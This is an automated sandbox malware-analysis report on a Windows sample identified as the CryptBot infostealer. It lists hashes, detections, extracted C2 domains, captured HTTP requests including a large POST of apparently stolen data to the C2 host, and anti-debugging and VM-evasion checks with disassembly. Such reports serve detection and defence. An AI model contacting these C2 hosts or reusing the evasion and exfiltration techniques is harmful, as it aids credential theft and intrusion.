Windows Analysis Report
random(5).exe

Overview

General Information

Sample name: random(5).exe
Analysis ID: 1583231
MD5: f200a3445a8034d201eeb79bb29e1d73
SHA1: 473cd32eb4bc8ff05c3e608b86ba651fc4d7b0e1
SHA256: ee6c112a14a1e5a9429b47f5b810f61a58e77860eea867e064d2ab40582757cc
Tags: exelev-tolstoi-comuser-JAMESWT_MHT
Infos:

Detection

Cryptbot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Cryptbot
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Hides threads from debuggers
Infostealer behavior detected
Leaks process information
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to create an SMB header
Detected potential crypto function
Entry point lies outside standard sections
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • random(5).exe (PID: 5792 cmdline: "C:\Users\user\Desktop\random(5).exe" MD5: F200A3445A8034D201EEB79BB29E1D73)
  • cleanup
Name: CryptBot
Description: A typical infostealer, capable of obtaining credentials for browsers, crypto currency wallets, browser cookies, credit cards, and creates screenshots of the infected system. All stolen data is bundled into a zip-file that is uploaded to the c2.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptbot
{"C2 list": ["KvgPhome.fortth14vs.top", ".for8014vs.top", "home.fortth14vs.top", ".1.1home.fortth14vs.top", ".forth14vs.top", "fortth14vsh14vs.top"]}
Source: Process Memory Space: random(5).exe PID: 5792
Rule: JoeSecurity_Cryptbot_1
Description: Yara detected Cryptbot
Author: Joe Security
    No Sigma rule has matched
    No Suricata rule has matched

    AV Detection

    Source: random(5).exe Avira: detected
    Source: KvgPhome.fortth14vs.top Avira URL Cloud: Label: malware
    Source: http://home.fortth14vs.top/gduZ0 Avira URL Cloud: Label: malware
    Source: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738?argument=0U Avira URL Cloud: Label: malware
    Source: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb18 Avira URL Cloud: Label: malware
    Source: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb17355377386963 Avira URL Cloud: Label: malware
    Source: .1.1home.fortth14vs.top Avira URL Cloud: Label: malware
    Source: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738?argument=0 Avira URL Cloud: Label: malware
    Source: home.fortth14vs.top Avira URL Cloud: Label: malware
    Source: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738http://home.fortth14vs.top/gduZhxVRrNSTmMah Avira URL Cloud: Label: malware
    Source: http://home.fortth14vs.top/gduZ Avira URL Cloud: Label: malware
    Source: http://home.fortth14vs.top/gduZT Avira URL Cloud: Label: malware
    Source: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738lse Avira URL Cloud: Label: malware
    Source: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738 Avira URL Cloud: Label: malware
    Source: random(5).exe.5792.0.memstrmin Malware Configuration Extractor: Cryptbot {"C2 list": ["KvgPhome.fortth14vs.top", ".for8014vs.top", "home.fortth14vs.top", ".1.1home.fortth14vs.top", ".forth14vs.top", "fortth14vsh14vs.top"]}
    Source: random(5).exe Virustotal: Detection: 48%
    Source: random(5).exe ReversingLabs: Detection: 44%
    Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
    Source: random(5).exe Joe Sandbox ML: detected
    Source: C:\Users\user\Desktop\random(5).exe Code function: -----BEGIN PUBLIC KEY----- 0_2_00E5DCF0
    Source: random(5).exe Binary or memory string: -----BEGIN PUBLIC KEY-----
    Source: C:\Users\user\Desktop\random(5).exe Code function: mov dword ptr [ebp+04h], 424D53FFh 0_2_00E9A5B0
    Source: C:\Users\user\Desktop\random(5).exe Code function: mov dword ptr [ebx+04h], 424D53FFh 0_2_00E9A7F0
    Source: C:\Users\user\Desktop\random(5).exe Code function: mov dword ptr [edi+04h], 424D53FFh 0_2_00E9A7F0
    Source: C:\Users\user\Desktop\random(5).exe Code function: mov dword ptr [esi+04h], 424D53FFh 0_2_00E9A7F0
    Source: C:\Users\user\Desktop\random(5).exe Code function: mov dword ptr [ebx+04h], 424D53FFh 0_2_00E9B560
    Source: random(5).exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
    Source: C:\Users\user\Desktop\random(5).exe Code function: 0_2_00E3255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses, 0_2_00E3255D
    Source: C:\Users\user\Desktop\random(5).exe Code function: 0_2_00E329FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle, 0_2_00E329FF

    Networking

    Source: Malware configuration extractor URLs: KvgPhome.fortth14vs.top
    Source: Malware configuration extractor URLs: .for8014vs.top
    Source: Malware configuration extractor URLs: home.fortth14vs.top
    Source: Malware configuration extractor URLs: .1.1home.fortth14vs.top
    Source: Malware configuration extractor URLs: .forth14vs.top
    Source: Malware configuration extractor URLs: fortth14vsh14vs.top
    Source: global traffic HTTP traffic detected: GET /ip HTTP/1.1 Host: httpbin.org Accept: */*
    Source: global traffic HTTP traffic detected: POST /gduZhxVRrNSTmMahdBGb1735537738 HTTP/1.1 Host: home.fortth14vs.top Accept: */* Content-Type: application/json Content-Length: 442005
    Source: global traffic HTTP traffic detected: GET /gduZhxVRrNSTmMahdBGb1735537738?argument=0 HTTP/1.1 Host: home.fortth14vs.top Accept: */*
    Source: global traffic HTTP traffic detected: POST /gduZhxVRrNSTmMahdBGb1735537738 HTTP/1.1 Host: home.fortth14vs.top Accept: */* Content-Type: application/json Content-Length: 31 Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "0", "data": "Done1" }
    Source: Joe Sandbox View IP Address: 34.147.147.173
    Source: Joe Sandbox View IP Address: 34.200.57.114
    Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: C:\Users\user\Desktop\random(5).exe Code function: 0_2_00EFA8C0 recvfrom, 0_2_00EFA8C0
    Source: global traffic DNS traffic detected: DNS query: httpbin.org
    Source: global traffic DNS traffic detected: DNS query: home.fortth14vs.top
    Source: unknown HTTP traffic detected: POST /gduZhxVRrNSTmMahdBGb1735537738 HTTP/1.1 Host: home.fortth14vs.top Accept: */* Content-Type: application/json Content-Length: 442005
    Source: global traffic HTTP traffic detected: HTTP/1.1 404 NOT FOUND server: nginx/1.22.1 date: Thu, 02 Jan 2025 08:15:13 GMT content-type: text/html; charset=utf-8 content-length: 207 Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
    Source: global traffic HTTP traffic detected: HTTP/1.1 404 NOT FOUND server: nginx/1.22.1 date: Thu, 02 Jan 2025 08:15:14 GMT content-type: text/html; charset=utf-8 content-length: 207 Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
    Source: random(5).exe, 00000000.00000003.2166958844.000000000719F000.00000004.00001000.00020000.00000000.sdmp, random(5).exe, 00000000.00000002.2258884895.0000000001410000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://.css
    Source: random(5).exe, 00000000.00000003.2166958844.000000000719F000.00000004.00001000.00020000.00000000.sdmp, random(5).exe, 00000000.00000002.2258884895.0000000001410000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://.jpg
    Source: random(5).exe, random(5).exe, 00000000.00000003.2251332310.000000000086B000.00000004.00000020.00020000.00000000.sdmp, random(5).exe, 00000000.00000003.2251291489.0000000000843000.00000004.00000020.00020000.00000000.sdmp, random(5).exe, 00000000.00000002.2258581917.000000000086C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fortth14vs.top/gduZ
    Source: random(5).exe, 00000000.00000003.2251332310.000000000086B000.00000004.00000020.00020000.00000000.sdmp, random(5).exe, 00000000.00000003.2251291489.0000000000843000.00000004.00000020.00020000.00000000.sdmp, random(5).exe, 00000000.00000002.2258581917.000000000086C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fortth14vs.top/gduZ0
    Source: random(5).exe, 00000000.00000003.2251332310.000000000086B000.00000004.00000020.00020000.00000000.sdmp, random(5).exe, 00000000.00000003.2251291489.0000000000843000.00000004.00000020.00020000.00000000.sdmp, random(5).exe, 00000000.00000002.2258581917.000000000086C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fortth14vs.top/gduZT
    Source: random(5).exe, 00000000.00000002.2257978659.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, random(5).exe, 00000000.00000002.2258884895.0000000001410000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738
    Source: random(5).exe, 00000000.00000002.2257978659.00000000007BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb17355377386963
    Source: random(5).exe, 00000000.00000002.2257978659.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, random(5).exe, 00000000.00000003.2251580735.00000000007F3000.00000004.00000020.00020000.00000000.sdmp, random(5).exe, 00000000.00000002.2258142461.00000000007F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738?argument=0
    Source: random(5).exe, 00000000.00000003.2251580735.00000000007F3000.00000004.00000020.00020000.00000000.sdmp, random(5).exe, 00000000.00000002.2258142461.00000000007F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738?argument=0U
    Source: random(5).exe, 00000000.00000002.2258884895.0000000001410000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738http://home.fortth14vs.top/gduZhxVRrNSTmMah
    Source: random(5).exe, 00000000.00000002.2257978659.00000000007BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738lse
    Source: random(5).exe, 00000000.00000002.2258884895.0000000001410000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb18
    Source: random(5).exe, 00000000.00000003.2166958844.000000000719F000.00000004.00001000.00020000.00000000.sdmp, random(5).exe, 00000000.00000002.2258884895.0000000001410000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://html4/loose.dtd
    Source: random(5).exe, 00000000.00000002.2258884895.0000000001410000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://curl.se/docs/alt-svc.html
    Source: random(5).exeString found in binary or memory: https://curl.se/docs/alt-svc.html#
    Source: random(5).exe, 00000000.00000002.2258884895.0000000001410000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://curl.se/docs/hsts.html
    Source: random(5).exeString found in binary or memory: https://curl.se/docs/hsts.html#
    Source: random(5).exe, random(5).exe, 00000000.00000003.2166958844.000000000719F000.00000004.00001000.00020000.00000000.sdmp, random(5).exe, 00000000.00000002.2258884895.0000000001410000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://curl.se/docs/http-cookies.html
    Source: random(5).exeString found in binary or memory: https://curl.se/docs/http-cookies.html#
    Source: random(5).exe, 00000000.00000003.2166958844.000000000719F000.00000004.00001000.00020000.00000000.sdmp, random(5).exe, 00000000.00000002.2258884895.0000000001410000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://httpbin.org/ip
    Source: random(5).exe, 00000000.00000003.2166958844.000000000719F000.00000004.00001000.00020000.00000000.sdmp, random(5).exe, 00000000.00000002.2258884895.0000000001410000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://httpbin.org/ipbefore
    Source: unknown Network traffic detected: HTTP traffic on port 49710 -> 443
    Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49710

    System Summary

    Source: random(5).exe Static PE information: section name:
    Source: random(5).exe Static PE information: section name: .idata
    Source: random(5).exe Static PE information: section name:
    Source: random(5).exe Static PE information: Section: whflkpvn ZLIB complexity 0.994563728436086
    Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@1/0@8/2
    Source: C:\Users\user\Desktop\random(5).exe Mutant created: \Sessions\1\BaseNamedObjects\My_mutex
    Source: C:\Users\user\Desktop\random(5).exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: C:\Users\user\Desktop\random(5).exe File read: C:\Windows\System32\drivers\etc\hosts
    Source: random(5).exeString found in binary or memory: Unable to complete request for channel-process-startup
    Source: random(5).exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
    Source: C:\Users\user\Desktop\random(5).exe Section loaded: apphelp.dll
    Source: C:\Users\user\Desktop\random(5).exe Section loaded: winmm.dll
    Source: C:\Users\user\Desktop\random(5).exe Section loaded: iphlpapi.dll
    Source: C:\Users\user\Desktop\random(5).exe Section loaded: cryptbase.dll
    Source: C:\Users\user\Desktop\random(5).exe Section loaded: cryptsp.dll
    Source: C:\Users\user\Desktop\random(5).exe Section loaded: rsaenh.dll
    Source: C:\Users\user\Desktop\random(5).exe Section loaded: dhcpcsvc6.dll
    Source: C:\Users\user\Desktop\random(5).exe Section loaded: dhcpcsvc.dll
    Source: C:\Users\user\Desktop\random(5).exe Section loaded: dnsapi.dll
    Source: C:\Users\user\Desktop\random(5).exe Section loaded: napinsp.dll
    Source: C:\Users\user\Desktop\random(5).exe Section loaded: pnrpnsp.dll
    Source: C:\Users\user\Desktop\random(5).exe Section loaded: wshbth.dll
    Source: C:\Users\user\Desktop\random(5).exe Section loaded: nlaapi.dll
    Source: C:\Users\user\Desktop\random(5).exe Section loaded: mswsock.dll
    Source: C:\Users\user\Desktop\random(5).exe Section loaded: winrnr.dll
    Source: C:\Users\user\Desktop\random(5).exe Section loaded: uxtheme.dll
    Source: C:\Users\user\Desktop\random(5).exe Section loaded: windows.storage.dll
    Source: C:\Users\user\Desktop\random(5).exe Section loaded: wldp.dll
    Source: C:\Users\user\Desktop\random(5).exe Section loaded: windowscodecs.dll
    Source: C:\Users\user\Desktop\random(5).exe Section loaded: kernel.appcore.dll
    Source: random(5).exe Static file information: File size 4484096 > 1048576
    Source: random(5).exe Static PE information: Raw size of is bigger than: 0x100000 < 0x289000
    Source: random(5).exe Static PE information: Raw size of whflkpvn is bigger than: 0x100000 < 0x1ba000

    Data Obfuscation

    Source: C:\Users\user\Desktop\random(5).exe Unpacked PE file: 0.2.random(5).exe.e30000.0.unpack :EW;.rsrc:W;.idata :W; :EW;whflkpvn:EW;esywlygt:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;whflkpvn:EW;esywlygt:EW;.taggant:EW;
    Source: initial sample Static PE information: section where entry point is pointing to: .taggant
    Source: random(5).exe Static PE information: real checksum: 0x4507bd should be: 0x4519af
    Source: random(5).exe Static PE information: section name:
    Source: random(5).exe Static PE information: section name: .idata
    Source: random(5).exe Static PE information: section name:
    Source: random(5).exe Static PE information: section name: whflkpvn
    Source: random(5).exe Static PE information: section name: esywlygt
    Source: random(5).exe Static PE information: section name: .taggant
    Source: C:\Users\user\Desktop\random(5).exe Code function: 0_3_00845F60 pushfd ; ret 0_3_00845F61
    Source: C:\Users\user\Desktop\random(5).exe Code function: 0_2_011B41D0 push eax; mov dword ptr [esp], edx 0_2_011B41D5
    Source: C:\Users\user\Desktop\random(5).exe Code function: 0_2_00EB2340 push eax; mov dword ptr [esp], 00000000h 0_2_00EB2343
    Source: C:\Users\user\Desktop\random(5).exe Code function: 0_2_00EEC7F0 push eax; mov dword ptr [esp], 00000000h 0_2_00EEC743
    Source: C:\Users\user\Desktop\random(5).exe Code function: 0_2_00E8E92D push es; retf 0_2_00E8E92E
    Source: C:\Users\user\Desktop\random(5).exe Code function: 0_2_00E70AC0 push eax; mov dword ptr [esp], 00000000h 0_2_00E70AC4
    Source: C:\Users\user\Desktop\random(5).exe Code function: 0_2_00E91430 push eax; mov dword ptr [esp], 00000000h 0_2_00E91433
    Source: C:\Users\user\Desktop\random(5).exe Code function: 0_2_00EB39A0 push eax; mov dword ptr [esp], 00000000h 0_2_00EB39A3
    Source: C:\Users\user\Desktop\random(5).exe Code function: 0_2_00E8DAD0 push eax; mov dword ptr [esp], edx 0_2_00E8DAD1
    Source: C:\Users\user\Desktop\random(5).exe Code function: 0_2_011B9F40 push dword ptr [eax+04h]; ret 0_2_011B9F6F
    Source: random(5).exe Static PE information: section name: whflkpvn entropy: 7.955966555987466

    Boot Survival

    Source: C:\Users\user\Desktop\random(5).exe Window searched: window name: FilemonClass
    Source: C:\Users\user\Desktop\random(5).exe Window searched: window name: PROCMON_WINDOW_CLASS
    Source: C:\Users\user\Desktop\random(5).exe Window searched: window name: RegmonClass
    Source: C:\Users\user\Desktop\random(5).exe Window searched: window name: Regmonclass
    Source: C:\Users\user\Desktop\random(5).exe Window searched: window name: Filemonclass

    Malware Analysis System Evasion

    Source: C:\Users\user\Desktop\random(5).exe File opened: HKEY_CURRENT_USER\Software\Wine
    Source: C:\Users\user\Desktop\random(5).exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
    Source: random(5).exe, 00000000.00000003.2166958844.000000000719F000.00000004.00001000.00020000.00000000.sdmp, random(5).exe, 00000000.00000002.2258884895.0000000001410000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: PROCMON.EXE
    Source: random(5).exe, 00000000.00000003.2166958844.000000000719F000.00000004.00001000.00020000.00000000.sdmp, random(5).exe, 00000000.00000002.2258884895.0000000001410000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: X64DBG.EXE
    Source: random(5).exe, 00000000.00000003.2166958844.000000000719F000.00000004.00001000.00020000.00000000.sdmp, random(5).exe, 00000000.00000002.2258884895.0000000001410000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: WINDBG.EXE
    Source: random(5).exe, 00000000.00000002.2258884895.0000000001410000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
    Source: random(5).exe, 00000000.00000003.2166958844.000000000719F000.00000004.00001000.00020000.00000000.sdmp, random(5).exe, 00000000.00000002.2258884895.0000000001410000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: WIRESHARK.EXE
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1744C19 second address: 1744C2D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CFC89BCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1741ECE second address: 1741ED4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1743E55 second address: 1743E59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1741ED4 second address: 1741EDE instructions: 0x00000000 rdtsc 0x00000002 je 00007F519CD4C37Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1745B99 second address: 1745BB5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CFC89C3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1746B68 second address: 1746B6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1746B6C second address: 1746BE9 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F519CFC89B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push edx 0x00000010 call 00007F519CFC89B8h 0x00000015 pop edx 0x00000016 mov dword ptr [esp+04h], edx 0x0000001a add dword ptr [esp+04h], 00000016h 0x00000022 inc edx 0x00000023 push edx 0x00000024 ret 0x00000025 pop edx 0x00000026 ret 0x00000027 jmp 00007F519CFC89C1h 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push edi 0x00000031 call 00007F519CFC89B8h 0x00000036 pop edi 0x00000037 mov dword ptr [esp+04h], edi 0x0000003b add dword ptr [esp+04h], 0000001Bh 0x00000043 inc edi 0x00000044 push edi 0x00000045 ret 0x00000046 pop edi 0x00000047 ret 0x00000048 push 00000000h 0x0000004a mov bx, 14F8h 0x0000004e xchg eax, esi 0x0000004f push eax 0x00000050 push edx 0x00000051 jc 00007F519CFC89C3h 0x00000057 jmp 00007F519CFC89BDh 0x0000005c rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1746BE9 second address: 1746BF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F519CD4C376h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1747AF1 second address: 1747B4B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ebx 0x0000000a push esi 0x0000000b jl 00007F519CFC89B6h 0x00000011 pop esi 0x00000012 pop ebx 0x00000013 nop 0x00000014 jnp 00007F519CFC89BCh 0x0000001a xor edi, 135C61F0h 0x00000020 push 00000000h 0x00000022 jne 00007F519CFC89BCh 0x00000028 push 00000000h 0x0000002a and bx, 747Fh 0x0000002f add dword ptr [ebp+122D1B7Eh], ecx 0x00000035 xchg eax, esi 0x00000036 push eax 0x00000037 push edx 0x00000038 jp 00007F519CFC89C6h 0x0000003e jmp 00007F519CFC89C0h 0x00000043 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1746D81 second address: 1746D85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1747CF3 second address: 1747CF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1749D36 second address: 1749DAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 jmp 00007F519CD4C37Eh 0x0000000c nop 0x0000000d push esi 0x0000000e mov edi, 7C94D246h 0x00000013 pop ebx 0x00000014 push dword ptr fs:[00000000h] 0x0000001b push 00000000h 0x0000001d push ebp 0x0000001e call 00007F519CD4C378h 0x00000023 pop ebp 0x00000024 mov dword ptr [esp+04h], ebp 0x00000028 add dword ptr [esp+04h], 00000017h 0x00000030 inc ebp 0x00000031 push ebp 0x00000032 ret 0x00000033 pop ebp 0x00000034 ret 0x00000035 sub edi, 183B8A94h 0x0000003b sub dword ptr [ebp+1247F3E8h], edi 0x00000041 mov dword ptr fs:[00000000h], esp 0x00000048 mov edi, dword ptr [ebp+122D3A1Fh] 0x0000004e mov eax, dword ptr [ebp+122D0921h] 0x00000054 mov dword ptr [ebp+12451724h], ebx 0x0000005a push FFFFFFFFh 0x0000005c mov bx, 8240h 0x00000060 nop 0x00000061 push eax 0x00000062 push edx 0x00000063 push edx 0x00000064 push eax 0x00000065 push edx 0x00000066 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1749DAA second address: 1749DAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 174AE45 second address: 174AE4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1749DAF second address: 1749DB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 174AEE9 second address: 174AEED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 174AEED second address: 174AEF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 174CEAF second address: 174CEB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 174FC69 second address: 174FC8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 pushad 0x00000008 jmp 00007F519CFC89C6h 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1755745 second address: 175576D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F519CD4C376h 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F519CD4C386h 0x00000011 jg 00007F519CD4C376h 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1758E1D second address: 1758E32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F519CFC89BEh 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1759123 second address: 1759129 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 175DC81 second address: 175DC91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d push eax 0x0000000e pop eax 0x0000000f pop esi 0x00000010 rdtsc
